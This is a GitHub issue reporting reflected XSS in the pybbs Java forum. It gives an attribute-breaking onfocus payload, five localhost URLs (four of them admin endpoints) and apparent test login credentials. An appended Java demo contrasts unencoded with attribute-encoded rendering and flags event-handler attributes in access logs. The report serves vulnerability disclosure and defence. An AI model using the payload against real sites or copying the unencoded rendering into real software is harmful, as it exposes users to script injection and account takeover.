atjiu / pybbs

A more practical community (forum) built with Java
GNU Affero General Public License v3.0

xss attacks #158

Closed. li-sui closed this issue 2 years ago

li-sui commented 2 years ago

XSS payload: `" onfocus="alert(1)" autofocus="`
method: GET

http://localhost:8080/search?keyword=" onfocus="alert(1)" autofocus="

The following requests require being logged in. test&123123

 http://localhost:8080/admin/comment/list?startDate=" onfocus="alert(1)" autofocus="
 http://localhost:8080/admin/user/list?username=" onfocus="alert(1)" autofocus="
 http://localhost:8080/admin/sensitive_word/list?word=" onfocus="alert(1)" autofocus="
 http://localhost:8080/admin/tag/list?name=" onfocus="alert(1)" autofocus="
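The reported payload works because the query parameter is reflected inside a double-quoted HTML attribute without attribute encoding, so the leading `"` closes the value and the rest of the string becomes new attributes on the element. The following Java class is an added illustration written for this page, not code from pybbs: it assumes a template that concatenates the parameter into an `<input value="...">` attribute (an assumption about the rendering shape, not a quote of the project's templates), shows the same markup rendered with and without attribute encoding, and adds a small check over constructed access-log lines that flags requests whose decoded query string carries an inline event-handler attribute such as `onfocus=`. The log format and the log lines are constructed for the example.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

public final class KeywordReflectionDemo {

    /** Encodes a value for placement inside a double-quoted HTML attribute. */
    static String encodeForHtmlAttribute(String s) {
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Assumed vulnerable shape: the query parameter is concatenated straight into the attribute. */
    static String renderUnsafe(String keyword) {
        return "<input name=\"keyword\" value=\"" + keyword + "\">";
    }

    /** Hardened shape: the same markup, but the value is attribute-encoded first. */
    static String renderSafe(String keyword) {
        return "<input name=\"keyword\" value=\"" + encodeForHtmlAttribute(keyword) + "\">";
    }

    // Matches an inline event handler (onfocus=, onerror=, ...) in a URL-decoded query string.
    private static final Pattern EVENT_HANDLER = Pattern.compile("(?i)\\bon[a-z]+\\s*=");

    /**
     * Returns the request paths, from constructed access-log lines of the form
     * "METHOD PATH?QUERY STATUS", whose decoded query string contains an event-handler attribute.
     */
    static List<String> flagSuspiciousRequests(List<String> accessLogLines) {
        List<String> hits = new ArrayList<>();
        for (String line : accessLogLines) {
            String[] parts = line.split(" ");
            if (parts.length < 2) continue;
            String target = parts[1];
            int q = target.indexOf('?');
            if (q < 0) continue;
            // Decode before matching so percent-encoded quotes and '=' are seen as the browser sees them.
            String query = URLDecoder.decode(target.substring(q + 1), StandardCharsets.UTF_8);
            if (EVENT_HANDLER.matcher(query).find()) {
                hits.add(target.substring(0, q));
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // The payload from the report, as a Java string literal.
        String payload = "\" onfocus=\"alert(1)\" autofocus=\"";
        System.out.println(renderUnsafe(payload));   // value attribute is closed, new attributes injected
        System.out.println(renderSafe(payload));     // quotes become &quot;, the string stays inside the value

        // Constructed log lines: one benign search and two percent-encoded instances of the payload.
        List<String> log = List.of(
            "GET /search?keyword=java 200",
            "GET /search?keyword=%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22 200",
            "GET /admin/tag/list?name=%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22 200");
        System.out.println(flagSuspiciousRequests(log));
    }
}
```

Compile and run with `javac KeywordReflectionDemo.java && java KeywordReflectionDemo` (Java 11 or later, for `List.of` and the `URLDecoder.decode(String, Charset)` overload). In a real Spring Boot template engine the encoder would be the engine's own auto-escaping for attribute context rather than a hand-written one; the point of the hand-written version is only to make visible which characters must be neutralised for the `"` in the report to stop terminating the attribute.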